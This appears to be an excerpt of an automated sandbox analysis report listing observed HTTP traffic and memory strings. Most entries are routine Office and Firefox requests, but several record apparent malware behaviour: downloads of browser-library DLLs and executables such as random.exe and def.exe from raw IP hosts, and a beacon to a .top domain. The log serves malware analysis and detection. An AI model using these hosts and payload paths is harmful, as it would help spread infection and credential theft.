Source: global traffic	HTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: GET /LCXOUUtXgrKhKDLYSbzW1732019347 HTTP/1.1Host: home.fvtekk5pn.topAccept: /
Source: global traffic	HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache

Source: chrome.exe, 00000022.00000003.2872705809.00006DEC006BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2998389906.00006DEC00412000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
Source: firefox.exe, 00000031.00000002.3342513448.0000024F70E31000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: 8www.facebook.com equals www.facebook.com (Facebook)
Source: chrome.exe, 00000022.00000003.2872705809.00006DEC006BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2998389906.00006DEC00412000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: firefox.exe, 00000031.00000002.3317267748.0000024F7016F000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: True if the "Variant 2" of the Migration Wizard browser / profile selection UI should be used. This is only meaningful in the new Migration Wizard.https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000031.00000002.3317267748.0000024F7016F000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: True if the "Variant 2" of the Migration Wizard browser / profile selection UI should be used. This is only meaningful in the new Migration Wizard.https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000031.00000002.3317267748.0000024F7016F000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: True if the "Variant 2" of the Migration Wizard browser / profile selection UI should be used. This is only meaningful in the new Migration Wizard.https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000031.00000002.3317267748.0000024F7016F000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000031.00000002.3317267748.0000024F7016F000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.youtube.com (Youtube)
